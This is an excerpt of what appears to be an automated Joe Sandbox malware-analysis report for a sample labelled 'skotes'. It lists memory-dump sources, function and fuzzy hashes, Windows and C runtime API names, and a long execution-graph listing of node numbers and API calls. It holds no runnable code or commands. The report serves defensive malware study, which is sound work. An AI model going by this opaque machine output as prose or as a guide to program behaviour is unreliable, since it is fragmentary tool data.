                                                                                                                                        • Associated: 00000005.00000002.2959206171.00000000010B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959554699.000000000124E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959617390.0000000001250000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_da0000_skotes.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 57040152-0
                                                                                                                                        • Opcode ID: 2a8e0e59600a87f299d2799d396515d2075e0fadbca03914eff460f991c96aed
                                                                                                                                        • Instruction ID: 446f417b8343de9ca23380fc2c3a8f6df4004eaf3dc35aa4dbd2ad8c631fce46
                                                                                                                                        • Opcode Fuzzy Hash: 2a8e0e59600a87f299d2799d396515d2075e0fadbca03914eff460f991c96aed
                                                                                                                                        • Instruction Fuzzy Hash: 50A1C070A01305DFEB20DF65C945BAAB7A9FF16314F088129F816D7251EB35EA04CBB1
                                                                                                                                        APIs
                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00DD4877
                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00DD487F
                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00DD4908
                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00DD4933
                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00DD4988
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2955106938.0000000000DA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955176966.0000000000E02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955369598.0000000000E09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000E0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000106F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000109D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959206171.00000000010B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959554699.000000000124E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959617390.0000000001250000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_da0000_skotes.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                        • String ID: csm
                                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                                        • Opcode ID: 0082ce7f5bcd727d2a4948a42b461793f86dea0bc31bb0b327bc96e75286730b
                                                                                                                                        • Instruction ID: b939f4f3236814d9cf5ab7bfc2fd722f66406ffb6680eb25d1067d3518900d88
                                                                                                                                        • Opcode Fuzzy Hash: 0082ce7f5bcd727d2a4948a42b461793f86dea0bc31bb0b327bc96e75286730b
                                                                                                                                        • Instruction Fuzzy Hash: 0551E434A002489BCF10DF69D895AAF7BB5EF45324F18815AE8189B392D732DA15CFB1
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2955106938.0000000000DA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955176966.0000000000E02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955369598.0000000000E09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000E0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000106F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000109D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959206171.00000000010B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959554699.000000000124E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959617390.0000000001250000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_da0000_skotes.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ___free_lconv_mon
                                                                                                                                        • String ID: 8"$`'$x!
                                                                                                                                        • API String ID: 3903695350-873893488
                                                                                                                                        • Opcode ID: 5658041c0a5bf4290c4e1edb60dfd538b1a42704a717d1246023957603373cf4
                                                                                                                                        • Instruction ID: 4122d0d6dac4a56b76e250f9b8864aafe82e4ca652003e53fd0f16792be74224
                                                                                                                                        • Opcode Fuzzy Hash: 5658041c0a5bf4290c4e1edb60dfd538b1a42704a717d1246023957603373cf4
                                                                                                                                        • Instruction Fuzzy Hash: 54313B31604241EFEB21AB7DD845B5B73E9EF40351F18842BE446D7795EE70A8848A31
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2955106938.0000000000DA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955176966.0000000000E02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955369598.0000000000E09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000E0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000106F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000109D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959206171.00000000010B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959554699.000000000124E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959617390.0000000001250000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_da0000_skotes.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _strrchr
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3213747228-0
                                                                                                                                        • Opcode ID: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                                                                                                        • Instruction ID: ce37887f30ea0564cd60548a0c9790ee0c691041b47014627f2d8f1a3bab5088
                                                                                                                                        • Opcode Fuzzy Hash: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                                                                                                        • Instruction Fuzzy Hash: F1B146729242879FDB11CF68C8817AEBBE6EF45340F18516BE955EB341D6349D02CBB0
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2955106938.0000000000DA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955176966.0000000000E02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955369598.0000000000E09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000E0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000106F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000109D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959206171.00000000010B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959554699.000000000124E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959617390.0000000001250000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_da0000_skotes.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 531285432-0
                                                                                                                                        • Opcode ID: 6a78cb987abacd9b710df4399c5f697658af6a9045f09bea204da02b0b24edd9
                                                                                                                                        • Instruction ID: 7807ab64521fdc0be3192cdc63b8c462716909d7848b9045a2d8d1d4749e8c34
                                                                                                                                        • Opcode Fuzzy Hash: 6a78cb987abacd9b710df4399c5f697658af6a9045f09bea204da02b0b24edd9
                                                                                                                                        • Instruction Fuzzy Hash: 60210C71A11219EFDF00EFA4D8859FEBBB9FF08710F10506AF502A7261DB609D019BB0
                                                                                                                                        APIs
                                                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00DAE4F9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                        • Associated: 00000005.00000002.2955106938.0000000000DA0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955176966.0000000000E02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955369598.0000000000E09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000E0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.0000000000F91000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000106F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.000000000109D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2955863796.00000000010B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959206171.00000000010B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959554699.000000000124E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 00000005.00000002.2959617390.0000000001250000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_da0000_skotes.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Xinvalid_argumentstd::_
                                                                                                                                        • String ID: L1$invalid stoi argument
                                                                                                                                        • API String ID: 909987262-3568411768
                                                                                                                                        • Opcode ID: cb64a260cfb711d7b5c4dbc45590a3954e08765d924b23545f876309179cc8b8
                                                                                                                                        • Instruction ID: 0400311825fd5a24121fe82a8edaa4a4aa643b35318ac2f05ab67588dd3e274d
                                                                                                                                        • Opcode Fuzzy Hash: cb64a260cfb711d7b5c4dbc45590a3954e08765d924b23545f876309179cc8b8
                                                                                                                                        • Instruction Fuzzy Hash: 61F09671901314AFD7209B68AC0695773ECEB4A710F144425FD24A3252EB70B944D6F3

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:1.9%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:4.7%
                                                                                                                                        Total number of Nodes:1539
                                                                                                                                        Total number of Limit Nodes:51
                                                                                                                                        execution_graph 95279 b21033 95284 b24c91 95279->95284 95283 b21042 95292 b2a961 95284->95292 95288 b24d9c 95290 b21038 95288->95290 95300 b251f7 22 API calls __fread_nolock 95288->95300 95291 b400a3 29 API calls __onexit 95290->95291 95291->95283 95301 b3fe0b 95292->95301 95294 b2a976 95311 b3fddb 95294->95311 95296 b24cff 95297 b23af0 95296->95297 95336 b23b1c 95297->95336 95300->95288 95303 b3fddb 95301->95303 95304 b3fdfa 95303->95304 95306 b3fdfc 95303->95306 95321 b4ea0c 95303->95321 95328 b44ead 7 API calls 2 library calls 95303->95328 95304->95294 95310 b4066d 95306->95310 95329 b432a4 RaiseException 95306->95329 95309 b4068a 95309->95294 95330 b432a4 RaiseException 95310->95330 95313 b3fde0 95311->95313 95312 b4ea0c ___std_exception_copy 21 API calls 95312->95313 95313->95312 95314 b3fdfa 95313->95314 95317 b3fdfc 95313->95317 95333 b44ead 7 API calls 2 library calls 95313->95333 95314->95296 95316 b4066d 95335 b432a4 RaiseException 95316->95335 95317->95316 95334 b432a4 RaiseException 95317->95334 95320 b4068a 95320->95296 95326 b53820 pre_c_initialization 95321->95326 95322 b5385e 95332 b4f2d9 20 API calls __dosmaperr 95322->95332 95324 b53849 RtlAllocateHeap 95325 b5385c 95324->95325 95324->95326 95325->95303 95326->95322 95326->95324 95331 b44ead 7 API calls 2 library calls 95326->95331 95328->95303 95329->95310 95330->95309 95331->95326 95332->95325 95333->95313 95334->95316 95335->95320 95337 b23b0f 95336->95337 95338 b23b29 95336->95338 95337->95288 95338->95337 95339 b23b30 RegOpenKeyExW 95338->95339 95339->95337 95340 b23b4a RegQueryValueExW 95339->95340 95341 b23b80 RegCloseKey 95340->95341 95342 b23b6b 95340->95342 95341->95337 95342->95341 95343 b73f75 95354 b3ceb1 95343->95354 95345 b73f8b 95346 b74006 95345->95346 95421 b3e300 23 API calls 95345->95421 95363 b2bf40 95346->95363 95348 b73fe6 95351 b74052 95348->95351 95422 b91abf 22 API calls 95348->95422 95353 b74a88 95351->95353 95423 b9359c 82 API calls __wsopen_s 95351->95423 95355 b3ced2 95354->95355 95356 b3cebf 95354->95356 95357 b3ced7 95355->95357 95358 b3cf05 95355->95358 95424 b2aceb 95356->95424 95360 b3fddb 22 API calls 95357->95360 95361 b2aceb 23 API calls 95358->95361 95362 b3cec9 95360->95362 95361->95362 95362->95345 95436 b2adf0 95363->95436 95365 b2bf9d 95366 b704b6 95365->95366 95367 b2bfa9 95365->95367 95454 b9359c 82 API calls __wsopen_s 95366->95454 95369 b704c6 95367->95369 95370 b2c01e 95367->95370 95455 b9359c 82 API calls __wsopen_s 95369->95455 95441 b2ac91 95370->95441 95374 b87120 22 API calls 95418 b2c039 __fread_nolock messages 95374->95418 95375 b2c7da 95378 b3fe0b 22 API calls 95375->95378 95387 b2c808 __fread_nolock 95378->95387 95380 b704f5 95383 b7055a 95380->95383 95456 b3d217 349 API calls 95380->95456 95405 b2c603 95383->95405 95457 b9359c 82 API calls __wsopen_s 95383->95457 95384 b2ec40 349 API calls 95384->95418 95385 b3fe0b 22 API calls 95417 b2c350 __fread_nolock messages 95385->95417 95386 b2af8a 22 API calls 95386->95418 95387->95385 95388 b7091a 95490 b93209 23 API calls 95388->95490 95391 b708a5 95464 b2ec40 95391->95464 95393 b708cf 95393->95405 95488 b2a81b 41 API calls 95393->95488 95395 b70591 95458 b9359c 82 API calls __wsopen_s 95395->95458 95396 b708f6 95489 b9359c 82 API calls __wsopen_s 95396->95489 95401 b2aceb 23 API calls 95401->95418 95402 b3fddb 22 API calls 95402->95418 95403 b2c237 95404 b2c253 95403->95404 95491 b2a8c7 22 API calls __fread_nolock 95403->95491 95407 b70976 95404->95407 95411 b2c297 messages 95404->95411 95405->95351 95409 b2aceb 23 API calls 95407->95409 95410 b709bf 95409->95410 95410->95405 95492 b9359c 82 API calls __wsopen_s 95410->95492 95411->95410 95412 b2aceb 23 API calls 95411->95412 95413 b2c335 95412->95413 95413->95410 95414 b2c342 95413->95414 95452 b2a704 22 API calls messages 95414->95452 95415 b2bbe0 40 API calls 95415->95418 95420 b2c3ac 95417->95420 95453 b3ce17 22 API calls messages 95417->95453 95418->95374 95418->95375 95418->95380 95418->95383 95418->95384 95418->95386 95418->95387 95418->95388 95418->95391 95418->95395 95418->95396 95418->95401 95418->95402 95418->95403 95418->95405 95418->95410 95418->95415 95419 b3fe0b 22 API calls 95418->95419 95445 b2ad81 95418->95445 95459 b87099 22 API calls __fread_nolock 95418->95459 95460 ba5745 54 API calls _wcslen 95418->95460 95461 b3aa42 22 API calls messages 95418->95461 95462 b8f05c 40 API calls 95418->95462 95463 b2a993 41 API calls 95418->95463 95419->95418 95420->95351 95421->95348 95422->95346 95423->95353 95425 b2acf9 95424->95425 95433 b2ad2a messages 95424->95433 95426 b2ad55 95425->95426 95427 b2ad01 messages 95425->95427 95426->95433 95434 b2a8c7 22 API calls __fread_nolock 95426->95434 95429 b2ad21 95427->95429 95430 b6fa48 95427->95430 95427->95433 95431 b6fa3a VariantClear 95429->95431 95429->95433 95430->95433 95435 b3ce17 22 API calls messages 95430->95435 95431->95433 95433->95362 95434->95433 95435->95433 95437 b2ae01 95436->95437 95440 b2ae1c messages 95436->95440 95493 b2aec9 95437->95493 95439 b2ae09 CharUpperBuffW 95439->95440 95440->95365 95442 b2acae 95441->95442 95443 b2acd1 95442->95443 95499 b9359c 82 API calls __wsopen_s 95442->95499 95443->95418 95446 b2ad92 95445->95446 95447 b6fadb 95445->95447 95448 b3fddb 22 API calls 95446->95448 95449 b2ad99 95448->95449 95500 b2adcd 95449->95500 95452->95417 95453->95417 95454->95369 95455->95405 95456->95383 95457->95405 95458->95405 95459->95418 95460->95418 95461->95418 95462->95418 95463->95418 95480 b2ec76 messages 95464->95480 95465 b40242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95465->95480 95466 b3fddb 22 API calls 95466->95480 95467 b74beb 95515 b9359c 82 API calls __wsopen_s 95467->95515 95468 b2fef7 95479 b2ed9d messages 95468->95479 95511 b2a8c7 22 API calls __fread_nolock 95468->95511 95471 b74b0b 95513 b9359c 82 API calls __wsopen_s 95471->95513 95472 b74600 95472->95479 95510 b2a8c7 22 API calls __fread_nolock 95472->95510 95477 b2a8c7 22 API calls 95477->95480 95479->95393 95480->95465 95480->95466 95480->95467 95480->95468 95480->95471 95480->95472 95480->95477 95480->95479 95481 b2fbe3 95480->95481 95482 b2a961 22 API calls 95480->95482 95483 b400a3 29 API calls pre_c_initialization 95480->95483 95486 b401f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 95480->95486 95487 b2f3ae messages 95480->95487 95508 b301e0 349 API calls 2 library calls 95480->95508 95509 b306a0 41 API calls messages 95480->95509 95481->95479 95484 b74bdc 95481->95484 95481->95487 95482->95480 95483->95480 95514 b9359c 82 API calls __wsopen_s 95484->95514 95486->95480 95487->95479 95512 b9359c 82 API calls __wsopen_s 95487->95512 95488->95396 95489->95405 95490->95403 95491->95404 95492->95405 95494 b2aed9 __fread_nolock 95493->95494 95495 b2aedc 95493->95495 95494->95439 95496 b3fddb 22 API calls 95495->95496 95497 b2aee7 95496->95497 95498 b3fe0b 22 API calls 95497->95498 95498->95494 95499->95443 95504 b2addd 95500->95504 95501 b2adb6 95501->95418 95502 b3fddb 22 API calls 95502->95504 95503 b2a961 22 API calls 95503->95504 95504->95501 95504->95502 95504->95503 95506 b2adcd 22 API calls 95504->95506 95507 b2a8c7 22 API calls __fread_nolock 95504->95507 95506->95504 95507->95504 95508->95480 95509->95480 95510->95479 95511->95479 95512->95479 95513->95479 95514->95467 95515->95479 95516 b23156 95519 b23170 95516->95519 95520 b23187 95519->95520 95521 b231eb 95520->95521 95522 b2318c 95520->95522 95559 b231e9 95520->95559 95526 b231f1 95521->95526 95527 b62dfb 95521->95527 95523 b23265 PostQuitMessage 95522->95523 95524 b23199 95522->95524 95561 b2316a 95523->95561 95529 b231a4 95524->95529 95530 b62e7c 95524->95530 95525 b231d0 DefWindowProcW 95525->95561 95531 b231f8 95526->95531 95532 b2321d SetTimer RegisterWindowMessageW 95526->95532 95575 b218e2 10 API calls 95527->95575 95534 b231ae 95529->95534 95535 b62e68 95529->95535 95589 b8bf30 34 API calls ___scrt_fastfail 95530->95589 95538 b23201 KillTimer 95531->95538 95539 b62d9c 95531->95539 95536 b23246 CreatePopupMenu 95532->95536 95532->95561 95533 b62e1c 95576 b3e499 42 API calls 95533->95576 95542 b62e4d 95534->95542 95543 b231b9 95534->95543 95564 b8c161 95535->95564 95536->95561 95571 b230f2 Shell_NotifyIconW ___scrt_fastfail 95538->95571 95545 b62dd7 MoveWindow 95539->95545 95546 b62da1 95539->95546 95542->95525 95588 b80ad7 22 API calls 95542->95588 95548 b231c4 95543->95548 95549 b23253 95543->95549 95544 b62e8e 95544->95525 95544->95561 95545->95561 95550 b62dc6 SetFocus 95546->95550 95551 b62da7 95546->95551 95548->95525 95577 b230f2 Shell_NotifyIconW ___scrt_fastfail 95548->95577 95573 b2326f 44 API calls ___scrt_fastfail 95549->95573 95550->95561 95551->95548 95555 b62db0 95551->95555 95552 b23214 95572 b23c50 DeleteObject DestroyWindow 95552->95572 95574 b218e2 10 API calls 95555->95574 95557 b23263 95557->95561 95559->95525 95562 b62e41 95578 b23837 95562->95578 95565 b8c179 ___scrt_fastfail 95564->95565 95566 b8c276 95564->95566 95590 b23923 95565->95590 95566->95561 95568 b8c25f KillTimer SetTimer 95568->95566 95569 b8c1a0 95569->95568 95570 b8c251 Shell_NotifyIconW 95569->95570 95570->95568 95571->95552 95572->95561 95573->95557 95574->95561 95575->95533 95576->95548 95577->95562 95579 b23862 ___scrt_fastfail 95578->95579 95680 b24212 95579->95680 95582 b238e8 95584 b63386 Shell_NotifyIconW 95582->95584 95585 b23906 Shell_NotifyIconW 95582->95585 95586 b23923 24 API calls 95585->95586 95587 b2391c 95586->95587 95587->95559 95588->95559 95589->95544 95591 b2393f 95590->95591 95610 b23a13 95590->95610 95612 b26270 95591->95612 95594 b63393 LoadStringW 95597 b633ad 95594->95597 95595 b2395a 95617 b26b57 95595->95617 95606 b23994 ___scrt_fastfail 95597->95606 95638 b2a8c7 22 API calls __fread_nolock 95597->95638 95598 b2396f 95599 b2397c 95598->95599 95600 b633c9 95598->95600 95599->95597 95602 b23986 95599->95602 95603 b26350 22 API calls 95600->95603 95629 b26350 95602->95629 95605 b633d7 95603->95605 95605->95606 95639 b233c6 95605->95639 95608 b239f9 Shell_NotifyIconW 95606->95608 95608->95610 95609 b633f9 95611 b233c6 22 API calls 95609->95611 95610->95569 95611->95606 95613 b3fe0b 22 API calls 95612->95613 95614 b26295 95613->95614 95615 b3fddb 22 API calls 95614->95615 95616 b2394d 95615->95616 95616->95594 95616->95595 95618 b26b67 _wcslen 95617->95618 95619 b64ba1 95617->95619 95622 b26ba2 95618->95622 95623 b26b7d 95618->95623 95649 b293b2 95619->95649 95621 b64baa 95621->95621 95625 b3fddb 22 API calls 95622->95625 95648 b26f34 22 API calls 95623->95648 95627 b26bae 95625->95627 95626 b26b85 __fread_nolock 95626->95598 95628 b3fe0b 22 API calls 95627->95628 95628->95626 95630 b26362 95629->95630 95631 b64a51 95629->95631 95653 b26373 95630->95653 95663 b24a88 22 API calls __fread_nolock 95631->95663 95634 b2636e 95634->95606 95635 b64a5b 95637 b64a67 95635->95637 95664 b2a8c7 22 API calls __fread_nolock 95635->95664 95638->95606 95640 b630bb 95639->95640 95641 b233dd 95639->95641 95643 b3fddb 22 API calls 95640->95643 95670 b233ee 95641->95670 95645 b630c5 _wcslen 95643->95645 95644 b233e8 95644->95609 95646 b3fe0b 22 API calls 95645->95646 95647 b630fe __fread_nolock 95646->95647 95648->95626 95650 b293c0 95649->95650 95652 b293c9 __fread_nolock 95649->95652 95651 b2aec9 22 API calls 95650->95651 95650->95652 95651->95652 95652->95621 95654 b26382 95653->95654 95660 b263b6 __fread_nolock 95653->95660 95655 b64a82 95654->95655 95656 b263a9 95654->95656 95654->95660 95658 b3fddb 22 API calls 95655->95658 95665 b2a587 95656->95665 95659 b64a91 95658->95659 95661 b3fe0b 22 API calls 95659->95661 95660->95634 95662 b64ac5 __fread_nolock 95661->95662 95663->95635 95664->95637 95667 b2a59d 95665->95667 95669 b2a598 __fread_nolock 95665->95669 95666 b6f80f 95667->95666 95668 b3fe0b 22 API calls 95667->95668 95668->95669 95669->95660 95671 b233fe _wcslen 95670->95671 95672 b23411 95671->95672 95673 b6311d 95671->95673 95675 b2a587 22 API calls 95672->95675 95674 b3fddb 22 API calls 95673->95674 95676 b63127 95674->95676 95677 b2341e __fread_nolock 95675->95677 95678 b3fe0b 22 API calls 95676->95678 95677->95644 95679 b63157 __fread_nolock 95678->95679 95681 b635a4 95680->95681 95682 b238b7 95680->95682 95681->95682 95683 b635ad DestroyIcon 95681->95683 95682->95582 95684 b8c874 42 API calls _strftime 95682->95684 95683->95682 95684->95582 95685 b22e37 95686 b2a961 22 API calls 95685->95686 95687 b22e4d 95686->95687 95764 b24ae3 95687->95764 95689 b22e6b 95778 b23a5a 95689->95778 95691 b22e7f 95785 b29cb3 95691->95785 95696 b62cb0 95836 b92cf9 95696->95836 95697 b22ead 95813 b2a8c7 22 API calls __fread_nolock 95697->95813 95699 b62cc3 95701 b62ccf 95699->95701 95862 b24f39 95699->95862 95705 b24f39 68 API calls 95701->95705 95702 b22ec3 95814 b26f88 22 API calls 95702->95814 95707 b62ce5 95705->95707 95706 b22ecf 95708 b29cb3 22 API calls 95706->95708 95868 b23084 22 API calls 95707->95868 95709 b22edc 95708->95709 95815 b2a81b 41 API calls 95709->95815 95712 b22eec 95714 b29cb3 22 API calls 95712->95714 95713 b62d02 95869 b23084 22 API calls 95713->95869 95715 b22f12 95714->95715 95816 b2a81b 41 API calls 95715->95816 95718 b62d1e 95719 b23a5a 24 API calls 95718->95719 95720 b62d44 95719->95720 95870 b23084 22 API calls 95720->95870 95721 b22f21 95724 b2a961 22 API calls 95721->95724 95723 b62d50 95871 b2a8c7 22 API calls __fread_nolock 95723->95871 95726 b22f3f 95724->95726 95817 b23084 22 API calls 95726->95817 95727 b62d5e 95872 b23084 22 API calls 95727->95872 95730 b22f4b 95818 b44a28 40 API calls 3 library calls 95730->95818 95731 b62d6d 95873 b2a8c7 22 API calls __fread_nolock 95731->95873 95733 b22f59 95733->95707 95734 b22f63 95733->95734 95819 b44a28 40 API calls 3 library calls 95734->95819 95737 b22f6e 95737->95713 95739 b22f78 95737->95739 95738 b62d83 95874 b23084 22 API calls 95738->95874 95820 b44a28 40 API calls 3 library calls 95739->95820 95742 b62d90 95743 b22f83 95743->95718 95744 b22f8d 95743->95744 95821 b44a28 40 API calls 3 library calls 95744->95821 95746 b22f98 95747 b22fdc 95746->95747 95822 b23084 22 API calls 95746->95822 95747->95731 95748 b22fe8 95747->95748 95748->95742 95825 b263eb 95748->95825 95751 b22fbf 95823 b2a8c7 22 API calls __fread_nolock 95751->95823 95755 b22fcd 95824 b23084 22 API calls 95755->95824 95756 b23006 95832 b270b0 23 API calls 95756->95832 95761 b23021 95762 b23065 95761->95762 95833 b26f88 22 